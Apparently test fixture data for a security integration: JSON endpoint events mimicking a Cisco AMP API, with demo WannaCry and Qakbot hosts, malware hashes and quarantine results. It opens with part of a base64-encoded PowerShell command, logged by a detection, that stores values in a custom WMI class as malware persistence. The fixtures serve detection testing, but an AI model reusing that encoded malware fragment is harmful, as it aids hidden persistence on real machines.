fQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat 